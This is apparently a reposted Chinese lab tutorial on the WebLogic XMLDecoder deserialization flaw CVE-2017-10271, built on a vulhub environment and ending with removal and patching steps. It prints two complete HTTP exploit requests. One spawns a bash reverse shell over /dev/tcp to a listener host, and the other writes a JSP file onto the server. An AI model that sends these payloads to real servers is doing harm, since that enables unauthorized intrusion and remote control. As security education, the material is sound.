1. 首页
  2. 文章中心
  3. 渗透测试

Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)

86 阅读 0 评论
我是靠谱客的博主 长情鱼,最近开发中收集的这篇文章主要介绍Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271),觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

漏洞概述:

Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。

环境搭建:

下载地址:https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271

漏洞检测:

在这里插入图片描述

漏洞利用:

使用kali监听4444端口:nc -l -p 4444
在这里插入图片描述

反弹shell

POC

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.168.133:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 642

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.168.131/4444 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

使用burp请求,发送poc:
在这里插入图片描述
kali反弹shell:
在这里插入图片描述
写入shell:

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.1.15:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.4.0" class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter"> 
    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
    <void method="println"><string>
    <![CDATA[
<% out.print("test"); %>
    ]]>
    </string>
    </void>
    <void method="close"/>
    </object></java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

在这里插入图片描述
访问shell地址:http://192.168.168.133:7001/bea_wls_internal/test.jsp
在这里插入图片描述

漏洞防御:

1、临时解决方案 根据业务所有需求,考虑是否删除WLS-WebServices组件。包含此组件路径为:

Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat

Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war

Middleware/wlserver_10.3/server/lib/wls-wsat.war

以上路径都在WebLogic安装处。删除以上文件之后,需重启WebLogic。确认http://weblogic_ip/wls-wsat/ 是否为404页面。

2、’官方补丁修复 前往Oracle官网下载10月份所提供的安全补丁

参考连接:https://blog.csdn.net/qq_29647709/article/details/84928306
https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271

最后

以上就是长情鱼为你收集整理的Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)的全部内容,希望文章能够帮你解决Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(57)

相关文章

DP好题集选
DP好题集选
dp小练习题解(长期更新)
dp小练习题解(长期更新)
WebLogic反序列化漏洞(CVE-2017-3248)
WebLogic反序列化漏洞(CVE-2017-3248)
漫谈-Weblogic-CVE-2020-2551
漫谈-Weblogic-CVE-2020-2551
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)
ZOJ 2068 Chopsticks
ZOJ 2068 Chopsticks
dp好题集锦动态规划专题
dp好题集锦动态规划专题
weblogic 反序列化(CVE-2017-10271)weblogic 反序列化(CVE-2017-10271)前言总结
weblogic 反序列化(CVE-2017-10271)weblogic 反序列化(CVE-2017-10271)前言总结

评论列表共有 0 条评论

立即
投稿
返回
顶部